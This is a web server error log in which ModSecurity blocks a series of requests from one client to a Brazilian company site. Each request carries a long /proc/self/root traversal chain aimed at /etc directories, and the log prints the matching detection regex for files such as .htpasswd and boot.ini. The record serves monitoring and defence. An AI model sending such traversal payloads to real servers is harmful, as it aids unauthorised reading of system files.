[Tue Mar 17 09:33:44.216096 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.243.203:49842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKKFKJy4A1bGlmj9BV6AAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:33:45.524668 2026] [:error] [pid 1731:tid 140411725141760] [client 74.7.243.203:49852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKKQb2qCuy5irgBMjJcQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:46.897894 2026] [:error] [pid 2553:tid 140411649607424] [client 74.7.243.203:49864] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKKv0Bec_B9OkZP_i9VgAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:48.196488 2026] [:error] [pid 1210:tid 140411548894976] [client 74.7.243.203:49866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKLFKJy4A1bGlmj9BV6wAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:48.674229 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.243.203:49872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKLJDEJR9VXonE_-1PNwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:50.281672 2026] [:error] [pid 2159:tid 140411699963648] [client 74.7.243.203:55370] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKLvct6CQ8jnRyg2p8qQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:51.832489 2026] [:error] [pid 1210:tid 140411725141760] [client 74.7.243.203:55378] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKL1KJy4A1bGlmj9BV7AAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:53.375931 2026] [:error] [pid 2159:tid 140411582465792] [client 74.7.243.203:55386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKMfct6CQ8jnRyg2p8qwAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:54.906884 2026] [:error] [pid 2159:tid 140411574073088] [client 74.7.243.203:55392] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKMvct6CQ8jnRyg2p8rAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:55.544708 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.228.16:48744] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablKM5DEJR9VXonE_-1PRAAAAQ4"]
[Tue Mar 17 09:33:56.547368 2026] [:error] [pid 1016:tid 140411616036608] [client 74.7.243.203:55396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKNJqmL8PQht4WJFlILgAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:59.330137 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.243.203:55400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKN1KJy4A1bGlmj9BV9QAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:02.416727 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.243.203:46854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKOu82sZHvlq4xgHrCswAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:04.053425 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.243.203:46870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKPP0Bec_B9OkZP_i9ZAAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:05.313549 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.243.203:46880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKPZqmL8PQht4WJFlIMgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:06.681072 2026] [:error] [pid 2553:tid 140411708356352] [client 74.7.243.203:46890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKPv0Bec_B9OkZP_i9ZgAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:08.749537 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.243.203:46900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKQNCmCSWTlPouqorMPAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:10.099536 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.243.203:46904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKQpqmL8PQht4WJFlINAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:11.464706 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.243.203:50674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKQ5DEJR9VXonE_-1PUQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:34:12.762384 2026] [:error] [pid 11469:tid 140411699963648] [client 74.7.243.203:50686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKRJDEJR9VXonE_-1PVAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:34:14.644445 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:50700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKRgeiSKl8TjouI-YCjQAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:18.551571 2026] [:error] [pid 2159:tid 140411599251200] [client 74.7.243.203:50716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKSvct6CQ8jnRyg2p8swAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
